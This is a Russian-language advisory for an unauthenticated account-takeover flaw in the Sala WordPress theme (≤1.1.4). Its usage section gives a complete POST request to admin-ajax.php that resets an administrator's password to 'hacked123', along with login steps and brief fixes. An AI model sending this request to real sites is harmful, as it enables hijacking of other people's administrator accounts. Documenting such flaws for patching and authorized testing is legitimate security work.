
Sala - Тема WordPress для стартапов и SaaS <= 1.1.4 - Неаутентифицированное повышение привилегий через сброс пароля/захват учётной записи
🔥 Краткое описание уязвимости
Тема WordPress Sala версий <= 1.1.4 уязвима к неаутентифицированному повышению привилегий. Эта ошибка позволяет неаутентифицированным злоумышленникам сбрасывать пароли произвольных пользователей — включая администраторов — путём прямого вызова открытой AJAX-конечной точки без проверки личности запрашивающего.
Эта уязвимость возникает из-за функции change_password_ajax, зарегистрированной как wp_ajax_nopriv_, которая устанавливает новый пароль для любого существующего логина без проверки авторизации запроса.
🔍 Затронутая тема
🧪 Характеристики эксплойта
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 Исследователь
🚀 Использование
Определите существующее имя пользователя на целевом сайте WordPress. Это можно сделать, проверив:
/author/username)Сформируйте следующий POST-запрос для сброса пароля пользователя:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
В случае успеха вы можете войти как целевой пользователь, используя новый пароль (в примере выше — hacked123).
Посетите /wp-login.php и подтвердите доступ.
🛠 Рекомендации по исправлению
wp_ajax_nopriv_change_password_ajax.is_user_logged_in() и подтверждайте личность пользователя перед разрешением чувствительных действий.🔒 Отказ от ответственности:
Данная информация предоставлена только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированная эксплуатация систем незаконна и неэтична.
📚 Ссылка: